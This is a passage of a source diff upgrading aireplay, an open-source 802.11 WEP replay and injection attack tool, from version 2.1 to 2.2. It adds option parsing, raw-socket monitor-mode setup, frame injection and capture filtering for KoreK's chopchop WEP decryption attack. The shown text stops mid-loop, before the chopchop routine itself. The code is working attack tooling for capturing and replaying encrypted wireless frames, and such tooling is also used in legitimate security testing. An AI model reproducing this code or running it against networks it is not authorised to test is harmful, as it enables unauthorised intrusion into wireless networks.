]>
Commit | Line | Data |
---|---|---|
68897318 GS |
1 | diff -urN aircrack-2.1.orig/aireplay.c aircrack-2.1/aireplay.c |
2 | --- aircrack-2.1.orig/aireplay.c 2004-10-01 21:30:00.000000000 +0200 | |
3 | +++ aircrack-2.1/aireplay.c 2005-04-22 08:51:21.932065120 +0200 | |
4 | @@ -1,7 +1,9 @@ | |
5 | /* | |
6 | - * 802.11 WEP arp-requests replay attack | |
7 | + * 802.11 WEP replay & injection attacks | |
8 | * | |
9 | - * Copyright (C) 2004 Christophe Devine | |
10 | + * Copyright (C) 2004,2005 Christophe Devine | |
11 | + * | |
12 | + * WEP decryption attack (chopchop) developped by KoreK | |
13 | * | |
14 | * This program is free software; you can redistribute it and/or modify | |
15 | * it under the terms of the GNU General Public License as published by | |
16 | @@ -18,41 +20,105 @@ | |
17 | * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA | |
18 | */ | |
19 | ||
20 | +#include <sys/types.h> | |
21 | #include <netpacket/packet.h> | |
22 | +#include <linux/rtc.h> | |
23 | #include <sys/ioctl.h> | |
24 | +#include <sys/wait.h> | |
25 | +#include <sys/stat.h> | |
26 | #include <arpa/inet.h> | |
27 | +#include <pthread.h> | |
28 | #include <net/if.h> | |
29 | #include <unistd.h> | |
30 | #include <signal.h> | |
31 | #include <string.h> | |
32 | #include <stdlib.h> | |
33 | #include <stdio.h> | |
34 | +#include <fcntl.h> | |
35 | +#include <errno.h> | |
36 | #include <time.h> | |
37 | ||
38 | -#include "pcap.h" | |
39 | +#include "pcap-aireplay.h" | |
40 | +#include "crctable.h" | |
41 | + | |
42 | +#define NULL_MAC "\x00\x00\x00\x00\x00\x00" | |
43 | ||
44 | #ifndef ETH_P_ALL | |
45 | #define ETH_P_ALL 3 | |
46 | #endif | |
47 | ||
48 | -#define BROADCAST_ADDR "\xFF\xFF\xFF\xFF\xFF\xFF" | |
49 | +#ifndef ETH_P_80211_RAW | |
50 | +#define ETH_P_80211_RAW 25 | |
51 | +#endif | |
52 | + | |
53 | +#ifndef ARPHRD_IEEE80211 | |
54 | +#define ARPHRD_IEEE80211 801 | |
55 | +#endif | |
56 | + | |
57 | +#ifndef ARPHRD_IEEE80211_PRISM | |
58 | +#define ARPHRD_IEEE80211_PRISM 802 | |
59 | +#endif | |
60 | ||
61 | char usage[] = | |
62 | ||
63 | "\n" | |
64 | -" aireplay 2.1 - (C) 2004 Christophe Devine\n" | |
65 | +" aireplay 2.2 - (C) 2004,2005 Christophe Devine\n" | |
66 | +"\n" | |
67 | +" usage: aireplay [options] <interface #0> [interface #1]\n" | |
68 | "\n" | |
69 | -" usage: aireplay <wifi interface> <input filename> [bssid]\n" | |
70 | +" interface #0 is for sending packets; it is also used to\n" | |
71 | +" capture packets unless interface #1 is specified.\n" | |
72 | +"\n" | |
73 | +" source options:\n" | |
74 | +"\n" | |
75 | +" -i : capture packet on-the-fly (default)\n" | |
76 | +" -r file : extract packet from this pcap file\n" | |
77 | +"\n" | |
78 | +" filter options:\n" | |
79 | +"\n" | |
80 | +" -b bssid : MAC address, Access Point\n" | |
81 | +" -d dmac : MAC address, Destination\n" | |
82 | +" -s smac : MAC address, Source\n" | |
83 | +" -m len : minimum packet length, default: 40\n" | |
84 | +" -n len : maximum packet length, default: 512\n" | |
85 | +" -u type : fc, type - default: 2 = data\n" | |
86 | +" -v subt : fc, subtype - default: 0 = normal\n" | |
87 | +" -t tods : fc, To DS bit - default: any\n" | |
88 | +" -f fromds : fc, From DS bit - default: any\n" | |
89 | +" -w iswep : fc, WEP bit - default: 1\n" | |
90 | +" -y : assume yes & don't save packet\n" | |
91 | +"\n" | |
92 | +" replay options:\n" | |
93 | +"\n" | |
94 | +" -x nbpps : number of packets per second\n" | |
95 | +" -a bssid : set Access Point MAC address\n" | |
96 | +" -c dmac : set Destination MAC address\n" | |
97 | +" -h smac : set Source MAC address\n" | |
98 | +" -o fc0 : set frame control[0] (hex)\n" | |
99 | +" -p fc1 : set frame control[1] (hex)\n" | |
100 | +" -k : turn chopchop attack on\n" | |
101 | "\n"; | |
102 | ||
103 | -unsigned char buffer[65536]; | |
104 | - | |
105 | -struct __packet | |
106 | +struct options | |
107 | { | |
108 | - unsigned int length; | |
109 | - unsigned char *data; | |
110 | -} | |
111 | -arp_packets[4096]; | |
112 | + unsigned char *s_file; | |
113 | + | |
114 | + unsigned char f_bssid[6]; | |
115 | + unsigned char f_smac[6]; | |
116 | + unsigned char f_dmac[6]; | |
117 | + int f_minlen, f_maxlen; | |
118 | + int f_type, f_subtype; | |
119 | + int f_fromds, f_tods, f_iswep; | |
120 | + int assume_yes; | |
121 | + | |
122 | + unsigned char r_bssid[6]; | |
123 | + unsigned char r_smac[6]; | |
124 | + unsigned char r_dmac[6]; | |
125 | + int r_fc_0, r_fc_1; | |
126 | + int nbpps, do_chopchop; | |
127 | +}; | |
128 | + | |
129 | +char *wlanng_dev = NULL; | |
130 | ||
131 | int do_exit = 0; | |
132 | ||
133 | @@ -60,295 +126,1370 @@ | |
134 | { | |
135 | if( signum == SIGINT || signum == SIGTERM ) | |
136 | do_exit = 1; | |
137 | + | |
138 | + if( signum == SIGALRM ) | |
139 | + do_exit = 2; | |
140 | } | |
141 | ||
142 | -int main( int argc, char *argv[] ) | |
143 | +/* CRC checksum verification routine */ | |
144 | + | |
145 | +int check_crc_buf( unsigned char *buf, int len ) | |
146 | { | |
147 | - FILE *f_cap; | |
148 | + unsigned long crc = 0xFFFFFFFF; | |
149 | ||
150 | - char *s; | |
151 | - int bssid_set; | |
152 | - long cnt1, cnt2; | |
153 | - int i, n, raw_sock; | |
154 | - unsigned char *h80211; | |
155 | - unsigned char bssid[6]; | |
156 | + for( ; len > 0; len--, buf++ ) | |
157 | + crc = crc_tbl[(crc ^ *buf) & 0xFF] ^ ( crc >> 8 ); | |
158 | + | |
159 | + return( ~crc == *((unsigned long *) buf) ); | |
160 | +} | |
161 | + | |
162 | +/* MAC address parsing routine */ | |
163 | + | |
164 | +int getmac( char *s, unsigned char *mac ) | |
165 | +{ | |
166 | + int i = 0, n; | |
167 | + | |
168 | + while( sscanf( s, "%x", &n ) == 1 ) | |
169 | + { | |
170 | + if( n < 0 || n > 255 ) | |
171 | + return( 1 ); | |
172 | + | |
173 | + mac[i] = n; | |
174 | ||
175 | + if( ++i == 6 ) break; | |
176 | + | |
177 | + if( ! ( s = strchr( s, ':' ) ) ) | |
178 | + break; | |
179 | + | |
180 | + s++; | |
181 | + } | |
182 | + | |
183 | + return( i != 6 ); | |
184 | +} | |
185 | + | |
186 | +/* interface initialization routine */ | |
187 | + | |
188 | +int openraw( char *iface, int fd, int *arptype ) | |
189 | +{ | |
190 | struct ifreq ifr; | |
191 | + struct packet_mreq mr; | |
192 | struct sockaddr_ll sll; | |
193 | - struct pcap_file_header pfh; | |
194 | - struct pcap_pkthdr pkh; | |
195 | - time_t tm_prev; | |
196 | + | |
197 | + /* find the interface index */ | |
198 | ||
199 | - /* create the raw socket */ | |
200 | + memset( &ifr, 0, sizeof( ifr ) ); | |
201 | + strncpy( ifr.ifr_name, iface, sizeof( ifr.ifr_name ) - 1 ); | |
202 | ||
203 | - if( ( raw_sock = socket( PF_PACKET, SOCK_RAW, | |
204 | - htons( ETH_P_ALL ) ) ) < 0 ) | |
205 | + if( ioctl( fd, SIOCGIFINDEX, &ifr ) < 0 ) | |
206 | { | |
207 | - perror( "socket(PF_PACKET)" ); | |
208 | + perror( "ioctl(SIOCGIFINDEX)" ); | |
209 | return( 1 ); | |
210 | } | |
211 | ||
212 | - /* drop privileges */ | |
213 | + /* bind the raw socket to the interface */ | |
214 | ||
215 | - setuid( getuid() ); | |
216 | + memset( &sll, 0, sizeof( sll ) ); | |
217 | + sll.sll_family = AF_PACKET; | |
218 | + sll.sll_ifindex = ifr.ifr_ifindex; | |
219 | + if( wlanng_dev ) | |
220 | + sll.sll_protocol = htons( ETH_P_80211_RAW ); | |
221 | + else | |
222 | + sll.sll_protocol = htons( ETH_P_ALL ); | |
223 | ||
224 | - /* check the arguments */ | |
225 | + if( bind( fd, (struct sockaddr *) &sll, | |
226 | + sizeof( sll ) ) < 0 ) | |
227 | + { | |
228 | + perror( "bind(ETH_P_ALL)" ); | |
229 | + return( 1 ); | |
230 | + } | |
231 | + | |
232 | + /* lookup the hardware type */ | |
233 | ||
234 | - if( argc < 3 || argc > 4 ) | |
235 | + if( ioctl( fd, SIOCGIFHWADDR, &ifr ) < 0 ) | |
236 | { | |
237 | - usage: | |
238 | - printf( usage ); | |
239 | + perror( "ioctl(SIOCGIFHWADDR)" ); | |
240 | return( 1 ); | |
241 | } | |
242 | ||
243 | - bssid_set = 0; | |
244 | + if( ifr.ifr_hwaddr.sa_family != ARPHRD_IEEE80211 && | |
245 | + ifr.ifr_hwaddr.sa_family != ARPHRD_IEEE80211_PRISM ) | |
246 | + { | |
247 | + fprintf( stderr, "unsupported hardware link type %d\n" | |
248 | + "(expected ARPHRD_IEEE80211{,PRISM})\n", | |
249 | + ifr.ifr_hwaddr.sa_family ); | |
250 | + fprintf( stderr, "make sure the interface is in Monitor mode\n" ); | |
251 | + return( 1 ); | |
252 | + } | |
253 | + | |
254 | + *arptype = ifr.ifr_hwaddr.sa_family; | |
255 | + | |
256 | + /* enable promiscuous mode */ | |
257 | ||
258 | - if( argc == 4 ) | |
259 | + memset( &mr, 0, sizeof( mr ) ); | |
260 | + mr.mr_ifindex = sll.sll_ifindex; | |
261 | + mr.mr_type = PACKET_MR_PROMISC; | |
262 | + | |
263 | + if( setsockopt( fd, SOL_PACKET, PACKET_ADD_MEMBERSHIP, | |
264 | + &mr, sizeof( mr ) ) < 0 ) | |
265 | { | |
266 | - i = 0; | |
267 | - s = optarg; | |
268 | + perror( "setsockopt(PACKET_MR_PROMISC)" ); | |
269 | + return( 1 ); | |
270 | + } | |
271 | ||
272 | - while( sscanf( s, "%x", &n ) == 1 ) | |
273 | - { | |
274 | - if( n < 0 || n > 255 ) | |
275 | - goto usage; | |
276 | + return( 0 ); | |
277 | +} | |
278 | + | |
279 | +/* wlanng-aware frame sending routing */ | |
280 | + | |
281 | +unsigned char tmpbuf[4096]; | |
282 | ||
283 | - bssid[i] = n; | |
284 | +int send_frame( int fd, void *buf, size_t count ) | |
285 | +{ | |
286 | + if( wlanng_dev ) | |
287 | + { | |
288 | + if( ( ((unsigned char *) buf)[0] & 3 ) != 3 ) | |
289 | + { | |
290 | + memcpy( tmpbuf, buf, 24 ); | |
291 | + memset( tmpbuf + 24, 0, 22 ); | |
292 | ||
293 | - if( ++i == 6 ) break; | |
294 | + tmpbuf[30] = ( count - 24 ) & 0xFF; | |
295 | + tmpbuf[31] = ( count - 24 ) >> 8; | |
296 | ||
297 | - if( ! ( s = strchr( s, ':' ) ) ) | |
298 | - break; | |
299 | + memcpy( tmpbuf + 46, buf + 24, count - 24 ); | |
300 | ||
301 | - s++; | |
302 | + count += 22; | |
303 | } | |
304 | + else | |
305 | + { | |
306 | + memcpy( tmpbuf, buf, 30 ); | |
307 | + memset( tmpbuf + 30, 0, 16 ); | |
308 | + | |
309 | + tmpbuf[30] = ( count - 30 ) & 0xFF; | |
310 | + tmpbuf[31] = ( count - 30 ) >> 8; | |
311 | ||
312 | - if( i != 6 ) goto usage; | |
313 | + memcpy( tmpbuf + 46, buf + 30, count - 30 ); | |
314 | + | |
315 | + count += 16; | |
316 | + } | |
317 | ||
318 | - bssid_set = 1; | |
319 | + buf = tmpbuf; | |
320 | } | |
321 | ||
322 | - if( argc - optind != 2 ) | |
323 | - goto usage; | |
324 | + return( write( fd, buf, count ) < 0 ); | |
325 | +} | |
326 | + | |
327 | +int main( int argc, char *argv[] ) | |
328 | +{ | |
329 | + time_t tt; | |
330 | + int i, j, n, z; | |
331 | + int fd_rtc, caplen; | |
332 | + int fd_in, arptype_in; | |
333 | + int fd_out, arptype_out; | |
334 | + int i_bssid, i_smac, i_dmac; | |
335 | + int data_start, data_end; | |
336 | + int guess, is_deauth_mode; | |
337 | + | |
338 | + unsigned long ticks[4]; | |
339 | + unsigned long crc_mask; | |
340 | + unsigned long nb_pkt_read; | |
341 | + unsigned long nb_pkt_sent; | |
342 | + | |
343 | + char tmp_str[256]; | |
344 | + | |
345 | + unsigned char buffer[4096]; | |
346 | + unsigned char *h80211; | |
347 | + unsigned char *savebuf; | |
348 | + unsigned char *chopped; | |
349 | + | |
350 | + FILE *f_cap_in = NULL; | |
351 | + FILE *f_cap_out = NULL; | |
352 | + | |
353 | + struct tm *lt; | |
354 | + struct timeval tv; | |
355 | + struct options opt; | |
356 | + struct pcap_file_header pfh; | |
357 | + struct pcap_pkthdr pkh; | |
358 | ||
359 | - if( strcmp( argv[optind], "wlan0ap" ) && | |
360 | - strcmp( argv[optind], "wlan1ap" ) && | |
361 | - strcmp( argv[optind], "wlan2ap" ) ) | |
362 | + fd_set rfds; | |
363 | + | |
364 | + /* create i/o raw sockets and open /dev/rtc */ | |
365 | + | |
366 | + if( ( fd_in = socket( PF_PACKET, SOCK_RAW, | |
367 | + htons( ETH_P_ALL ) ) ) < 0 ) | |
368 | { | |
369 | - fprintf( stderr, "This program only works with HostAP's " | |
370 | - "wlan#ap interface.\n" ); | |
371 | + perror( "socket(PF_PACKET)" ); | |
372 | return( 1 ); | |
373 | } | |
374 | ||
375 | - /* open the input file and check the pcap header */ | |
376 | - | |
377 | - if( ( f_cap = fopen( argv[optind + 1], "rb" ) ) == NULL ) | |
378 | + if( ( fd_out = socket( PF_PACKET, SOCK_RAW, | |
379 | + htons( ETH_P_ALL ) ) ) < 0 ) | |
380 | { | |
381 | - perror( "open" ); | |
382 | + perror( "socket(PF_PACKET)" ); | |
383 | return( 1 ); | |
384 | } | |
385 | ||
386 | - n = sizeof( struct pcap_file_header ); | |
387 | - | |
388 | - if( fread( &pfh, 1, n, f_cap ) != (size_t) n ) | |
389 | + if( ( fd_rtc = open( "/dev/rtc", O_RDONLY ) ) < 0 ) | |
390 | { | |
391 | - perror( "read(pcap header)" ); | |
392 | + perror( "open(/dev/rtc)" ); | |
393 | return( 1 ); | |
394 | } | |
395 | ||
396 | - if( pfh.magic != TCPDUMP_MAGIC ) | |
397 | + if( ioctl( fd_rtc, RTC_IRQP_SET, 4096 ) < 0 ) | |
398 | { | |
399 | - fprintf( stderr, "wrong magic from pcap file header\n" | |
400 | - "(got 0x%08X, expected 0x%08X)\n", | |
401 | - pfh.magic, TCPDUMP_MAGIC ); | |
402 | + perror( "ioctl(RTC_IRQP_SET)" ); | |
403 | + printf( "Make sure you have enhanced rtc support in your kernel\n" | |
404 | + "(module rtc) and that CONFIG_HPET_RTC_IRQ is disabled.\n" ); | |
405 | return( 1 ); | |
406 | } | |
407 | ||
408 | - if( pfh.linktype != LINKTYPE_IEEE802_11 && | |
409 | - pfh.linktype != LINKTYPE_PRISM_HEADER ) | |
410 | + if( ioctl( fd_rtc, RTC_PIE_ON, 0 ) < 0 ) | |
411 | { | |
412 | - fprintf( stderr, "unsupported pcap header linktype %d\n", | |
413 | - pfh.linktype ); | |
414 | + perror( "ioctl(RTC_PIE_ON)" ); | |
415 | return( 1 ); | |
416 | } | |
417 | ||
418 | - /* find the interface index */ | |
419 | + /* drop privileges */ | |
420 | ||
421 | - memset( &ifr, 0, sizeof( ifr ) ); | |
422 | - strncpy( ifr.ifr_name, argv[optind], sizeof( ifr.ifr_name ) - 1 ); | |
423 | + setuid( getuid() ); | |
424 | + | |
425 | + /* check the arguments */ | |
426 | + | |
427 | + memset( &opt, 0, sizeof( opt ) ); | |
428 | + | |
429 | + opt.f_minlen = 40; | |
430 | + opt.f_maxlen = 512; | |
431 | + opt.f_type = 2; | |
432 | + opt.f_subtype = 0; | |
433 | + opt.f_tods = -1; | |
434 | + opt.f_fromds = -1; | |
435 | + opt.f_iswep = 1; | |
436 | + opt.r_fc_0 = -1; | |
437 | + opt.r_fc_1 = -1; | |
438 | ||
439 | - if( ioctl( raw_sock, SIOCGIFINDEX, &ifr ) < 0 ) | |
440 | + while( 1 ) | |
441 | { | |
442 | - perror( "ioctl(SIOCGIFINDEX)" ); | |
443 | - return( 1 ); | |
444 | + int option = getopt( argc, argv, | |
445 | + "ir:b:d:s:m:n:u:v:t:f:w:yx:a:c:h:o:p:k" ); | |
446 | + | |
447 | + if( option < 0 ) break; | |
448 | + | |
449 | + switch( option ) | |
450 | + { | |
451 | + case 'i' : break; | |
452 | + | |
453 | + case 'r' : if( opt.s_file != NULL ) | |
454 | + { | |
455 | + printf( "Packet source file already specified.\n" ); | |
456 | + return( 1 ); | |
457 | + } | |
458 | + opt.s_file = optarg; | |
459 | + break; | |
460 | + | |
461 | + case 'b' : if( getmac( optarg, opt.f_bssid ) != 0 ) | |
462 | + { | |
463 | + printf( "Invalid AP MAC address.\n" ); | |
464 | + return( 1 ); | |
465 | + } | |
466 | + break; | |
467 | + | |
468 | + case 'd' : if( getmac( optarg, opt.f_dmac ) != 0 ) | |
469 | + { | |
470 | + printf( "Invalid destination MAC address.\n" ); | |
471 | + return( 1 ); | |
472 | + } | |
473 | + break; | |
474 | + | |
475 | + case 's' : if( getmac( optarg, opt.f_smac ) != 0 ) | |
476 | + { | |
477 | + printf( "Invalid source MAC address.\n" ); | |
478 | + return( 1 ); | |
479 | + } | |
480 | + break; | |
481 | + | |
482 | + case 'm' : sscanf( optarg, "%d", &opt.f_minlen ); | |
483 | + if( opt.f_minlen < 0 ) | |
484 | + { | |
485 | + printf( "Invalid minimum length filter.\n" ); | |
486 | + return( 1 ); | |
487 | + } | |
488 | + break; | |
489 | + | |
490 | + case 'n' : sscanf( optarg, "%d", &opt.f_maxlen ); | |
491 | + if( opt.f_maxlen < 0 ) | |
492 | + { | |
493 | + printf( "Invalid maximum length filter.\n" ); | |
494 | + return( 1 ); | |
495 | + } | |
496 | + break; | |
497 | + | |
498 | + case 'u' : sscanf( optarg, "%d", &opt.f_type ); | |
499 | + if( opt.f_type < 0 || opt.f_type > 3 ) | |
500 | + { | |
501 | + printf( "Invalid type filter.\n" ); | |
502 | + return( 1 ); | |
503 | + } | |
504 | + break; | |
505 | + | |
506 | + case 'v' : sscanf( optarg, "%d", &opt.f_subtype ); | |
507 | + if( opt.f_subtype < 0 || opt.f_subtype > 15 ) | |
508 | + { | |
509 | + printf( "Invalid subtype filter.\n" ); | |
510 | + return( 1 ); | |
511 | + } | |
512 | + break; | |
513 | + | |
514 | + case 't' : sscanf( optarg, "%d", &opt.f_tods ); | |
515 | + if( opt.f_tods != 0 && opt.f_tods != 1 ) | |
516 | + { | |
517 | + printf( "Invalid tods filter.\n" ); | |
518 | + return( 1 ); | |
519 | + } | |
520 | + break; | |
521 | + | |
522 | + case 'f' : sscanf( optarg, "%d", &opt.f_fromds ); | |
523 | + if( opt.f_fromds != 0 && opt.f_fromds != 1 ) | |
524 | + { | |
525 | + printf( "Invalid fromds filter.\n" ); | |
526 | + return( 1 ); | |
527 | + } | |
528 | + break; | |
529 | + | |
530 | + case 'w' : sscanf( optarg, "%d", &opt.f_iswep ); | |
531 | + if( opt.f_iswep != 0 && opt.f_iswep != 1 ) | |
532 | + { | |
533 | + printf( "Invalid wep filter.\n" ); | |
534 | + return( 1 ); | |
535 | + } | |
536 | + break; | |
537 | + | |
538 | + case 'y' : opt.assume_yes = 1; break; | |
539 | + | |
540 | + case 'x' : sscanf( optarg, "%d", &opt.nbpps ); | |
541 | + if( opt.nbpps < 1 || opt.nbpps > 4096 ) | |
542 | + { | |
543 | + printf( "Invalid number of packets per second.\n" ); | |
544 | + return( 1 ); | |
545 | + } | |
546 | + break; | |
547 | + | |
548 | + case 'a' : if( getmac( optarg, opt.r_bssid ) != 0 ) | |
549 | + { | |
550 | + printf( "Invalid AP MAC address.\n" ); | |
551 | + return( 1 ); | |
552 | + } | |
553 | + break; | |
554 | + | |
555 | + case 'c' : if( getmac( optarg, opt.r_dmac ) != 0 ) | |
556 | + { | |
557 | + printf( "Invalid destination MAC address.\n" ); | |
558 | + return( 1 ); | |
559 | + } | |
560 | + break; | |
561 | + | |
562 | + case 'h' : if( getmac( optarg, opt.r_smac ) != 0 ) | |
563 | + { | |
564 | + printf( "Invalid source MAC address.\n" ); | |
565 | + return( 1 ); | |
566 | + } | |
567 | + break; | |
568 | + | |
569 | + case 'o' : sscanf( optarg, "%x", &opt.r_fc_0 ); | |
570 | + if( opt.r_fc_0 < 0 || opt.r_fc_0 > 255 ) | |
571 | + { | |
572 | + printf( "Invalid frame control byte #0.\n" ); | |
573 | + return( 1 ); | |
574 | + } | |
575 | + break; | |
576 | + | |
577 | + case 'p' : sscanf( optarg, "%x", &opt.r_fc_1 ); | |
578 | + if( opt.r_fc_1 < 0 || opt.r_fc_1 > 255 ) | |
579 | + { | |
580 | + printf( "Invalid frame control byte #1.\n" ); | |
581 | + return( 1 ); | |
582 | + } | |
583 | + break; | |
584 | + | |
585 | + case 'k' : opt.do_chopchop = 1; break; | |
586 | + | |
587 | + default : goto usage; break; | |
588 | + } | |
589 | } | |
590 | ||
591 | - /* bind the raw socket to the interface */ | |
592 | + if( argc - optind < 1 || argc - optind > 2 ) | |
593 | + { | |
594 | + usage: | |
595 | + printf( usage ); | |
596 | + return( 1 ); | |
597 | + } | |
598 | ||
599 | - memset( &sll, 0, sizeof( sll ) ); | |
600 | - sll.sll_family = AF_PACKET; | |
601 | - sll.sll_ifindex = ifr.ifr_ifindex; | |
602 | - sll.sll_protocol = htons( ETH_P_ALL ); | |
603 | + if( opt.f_minlen > opt.f_maxlen ) | |
604 | + { | |
605 | + printf( "Invalid length filter (%d > %d).\n", | |
606 | + opt.f_minlen, opt.f_maxlen ); | |
607 | + return( 1 ); | |
608 | + } | |
609 | ||
610 | - if( bind( raw_sock, (struct sockaddr *) &sll, | |
611 | - sizeof( sll ) ) < 0 ) | |
612 | + if( opt.nbpps == 0 ) | |
613 | { | |
614 | - perror( "bind(ETH_P_ALL)" ); | |
615 | + opt.nbpps = 256; | |
616 | + printf( "Option -x not specified, assuming %d.\n", | |
617 | + opt.nbpps ); | |
618 | + } | |
619 | + | |
620 | + if( memcmp( argv[optind], "wlan", 4 ) == 0 ) | |
621 | + wlanng_dev = argv[optind]; | |
622 | + | |
623 | + if( openraw( argv[optind], fd_out, &arptype_out ) != 0 ) | |
624 | return( 1 ); | |
625 | + | |
626 | + /* open the packet source */ | |
627 | + | |
628 | + if( argc - optind == 2 ) | |
629 | + { | |
630 | + if( openraw( argv[argc - 1], fd_in, &arptype_in ) != 0 ) | |
631 | + return( 1 ); | |
632 | + } | |
633 | + else | |
634 | + { | |
635 | + fd_in = fd_out; | |
636 | + arptype_in = arptype_out; | |
637 | + } | |
638 | + | |
639 | + if( opt.s_file != NULL ) | |
640 | + { | |
641 | + if( ! ( f_cap_in = fopen( opt.s_file, "rb" ) ) ) | |
642 | + { | |
643 | + perror( "open" ); | |
644 | + return( 1 ); | |
645 | + } | |
646 | + | |
647 | + n = sizeof( struct pcap_file_header ); | |
648 | + | |
649 | + if( fread( &pfh, 1, n, f_cap_in ) != (size_t) n ) | |
650 | + { | |
651 | + perror( "fread(pcap file header)" ); | |
652 | + return( 1 ); | |
653 | + } | |
654 | + | |
655 | + if( pfh.magic != TCPDUMP_MAGIC && | |
656 | + pfh.magic != TCPDUMP_CIGAM ) | |
657 | + { | |
658 | + fprintf( stderr, "wrong magic from pcap file header\n" ); | |
659 | + return( 1 ); | |
660 | + } | |
661 | + | |
662 | + if( pfh.magic == TCPDUMP_CIGAM ) | |
663 | + SWAP32(pfh.linktype); | |
664 | + | |
665 | + if( pfh.linktype != LINKTYPE_IEEE802_11 && | |
666 | + pfh.linktype != LINKTYPE_PRISM_HEADER ) | |
667 | + { | |
668 | + fprintf( stderr, "'%s' is not a 802.11 capture file.\n", | |
669 | + opt.s_file ); | |
670 | + return( 1 ); | |
671 | + } | |
672 | } | |
673 | ||
674 | - signal( SIGINT, sighandler ); | |
675 | + /* look for replay-able packets */ | |
676 | ||
677 | - tm_prev = time( NULL ); | |
678 | + signal( SIGINT, sighandler ); | |
679 | + signal( SIGTERM, sighandler ); | |
680 | ||
681 | - cnt1 = cnt2 = 0; | |
682 | + nb_pkt_read = 0; | |
683 | ||
684 | - /* search for potentially usable packets */ | |
685 | + tt = time( NULL ); | |
686 | ||
687 | while( 1 ) | |
688 | { | |
689 | - if( do_exit ) break; | |
690 | + if( do_exit ) | |
691 | + { | |
692 | + printf( "exiting.\n" ); | |
693 | + return( 1 ); | |
694 | + } | |
695 | ||
696 | - if( time( NULL ) - tm_prev >= 1 ) | |
697 | + if( time( NULL ) - tt >= 1 ) | |
698 | { | |
699 | - tm_prev = time( NULL ); | |
700 | - printf( "\r\33[1KRead %ld packets, got %ld " | |
701 | - "potential ARP packets\r", cnt1, cnt2 ); | |
702 | + tt = time( NULL ); | |
703 | + printf( "\rSeen %ld packets...\33[K", nb_pkt_read ); | |
704 | fflush( stdout ); | |
705 | } | |
706 | ||
707 | - /* read one packet */ | |
708 | + caplen = 0; | |
709 | ||
710 | - n = sizeof( pkh ); | |
711 | + if( opt.s_file == NULL ) | |
712 | + { | |
713 | + /* capture one packet */ | |
714 | ||
715 | - if( fread( &pkh, 1, n, f_cap ) != (size_t) n ) | |
716 | - break; | |
717 | + FD_ZERO( &rfds ); | |
718 | + FD_SET( fd_in, &rfds ); | |
719 | ||
720 | - if( pkh.len != pkh.caplen ) | |
721 | - continue; | |
722 | + tv.tv_sec = 1; | |
723 | + tv.tv_usec = 0; | |
724 | ||
725 | - n = pkh.caplen; | |
726 | + if( select( fd_in + 1, &rfds, NULL, NULL, NULL ) < 0 ) | |
727 | + { | |
728 | + if( errno == EINTR ) continue; | |
729 | + perror( "select" ); | |
730 | + return( 1 ); | |
731 | + } | |
732 | ||
733 | - if( fread( buffer, 1, n, f_cap ) != (size_t) n ) | |
734 | - break; | |
735 | + if( ! FD_ISSET( fd_in, &rfds ) ) | |
736 | + continue; | |
737 | ||
738 | - cnt1++; | |
739 | + /* one packet available for reading */ | |
740 | ||
741 | - h80211 = buffer; | |
742 | + gettimeofday( &tv, NULL ); | |
743 | + | |
744 | + memset( buffer, 0, 2048 ); | |
745 | ||
746 | - if( pfh.linktype == LINKTYPE_PRISM_HEADER ) | |
747 | + if( ( caplen = read( fd_in, buffer, | |
748 | + sizeof( buffer ) ) ) < 0 ) | |
749 | + { | |
750 | + perror( "read" ); | |
751 | + return( 1 ); | |
752 | + } | |
753 | + | |
754 | + /* if device is an atheros, remove the FCS */ | |
755 | + | |
756 | + if( memcmp( argv[argc - 1], "ath", 3 ) == 0 ) | |
757 | + caplen -= 4; | |
758 | + } | |
759 | + else | |
760 | { | |
761 | - /* remove the prism header if necessary */ | |
762 | + /* read one packet */ | |
763 | ||
764 | - n = *(int *)( h80211 + 4 ); | |
765 | + n = sizeof( pkh ); | |
766 | ||
767 | - if( n < 8 || n >= (int) pkh.len ) | |
768 | + if( fread( &pkh, 1, n, f_cap_in ) != (size_t) n ) | |
769 | + { | |
770 | + printf( "\rSeen %ld packets...EOF.\n", | |
771 | + nb_pkt_read ); | |
772 | + return( 1 ); | |
773 | + } | |
774 | + | |
775 | + if( pfh.magic == TCPDUMP_CIGAM ) | |
776 | + SWAP32( pkh.caplen ); | |
777 | + | |
778 | + n = caplen = pkh.caplen; | |
779 | + | |
780 | + if( fread( buffer, 1, n, f_cap_in ) != (size_t) n ) | |
781 | + { | |
782 | + printf( "\rSeen %ld packets...EOF.\n", | |
783 | + nb_pkt_read ); | |
784 | + return( 1 ); | |
785 | + } | |
786 | + } | |
787 | + | |
788 | + nb_pkt_read++; | |
789 | + | |
790 | + /* skip the prism header if present */ | |
791 | + | |
792 | + h80211 = buffer; | |
793 | + | |
794 | + if( ( opt.s_file == NULL && arptype_in == ARPHRD_IEEE80211_PRISM ) || | |
795 | + ( opt.s_file != NULL && pfh.linktype == LINKTYPE_PRISM_HEADER ) ) | |
796 | + { | |
797 | + n = *(int *)( buffer + 4 ); | |
798 | + | |
799 | + if( n < 8 || n >= (int) caplen ) | |
800 | continue; | |
801 | ||
802 | - h80211 += n; pkh.len -= n; | |
803 | + h80211 += n; | |
804 | + caplen -= n; | |
805 | } | |
806 | ||
807 | - /* check if it's an encrypted data packet */ | |
808 | + /* check length */ | |
809 | + | |
810 | + if( caplen < opt.f_minlen || | |
811 | + caplen > opt.f_maxlen ) continue; | |
812 | ||
813 | - if( pkh.len < 40 ) continue; | |
814 | + /* check the frame control bytes */ | |
815 | ||
816 | - if( ( h80211[0] & 0x0C ) != 0x08 ) continue; | |
817 | - if( ( h80211[1] & 0x40 ) != 0x40 ) continue; | |
818 | + if( ( h80211[0] & 0x0C ) != ( opt.f_type << 2 ) && | |
819 | + opt.f_type >= 0 ) continue; | |
820 | ||
821 | - /* also check the BSSID and KeyID */ | |
822 | + if( ( h80211[0] & 0xF0 ) != ( opt.f_subtype << 4 ) && | |
823 | + opt.f_subtype >= 0 ) continue; | |
824 | + | |
825 | + if( ( h80211[1] & 0x01 ) != ( opt.f_tods ) && | |
826 | + opt.f_tods >= 0 ) continue; | |
827 | + | |
828 | + if( ( h80211[1] & 0x02 ) != ( opt.f_fromds << 1 ) && | |
829 | + opt.f_fromds >= 0 ) continue; | |
830 | + | |
831 | + if( ( h80211[1] & 0x40 ) != ( opt.f_iswep << 6 ) && | |
832 | + opt.f_iswep >= 0 ) continue; | |
833 | + | |
834 | + /* check the extended IV (TKIP) flag */ | |
835 | + | |
836 | + z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30; | |
837 | + | |
838 | + if( opt.f_type == 2 && opt.f_iswep == 1 && | |
839 | + ( h80211[z + 3] & 0x20 ) != 0 ) continue; | |
840 | + | |
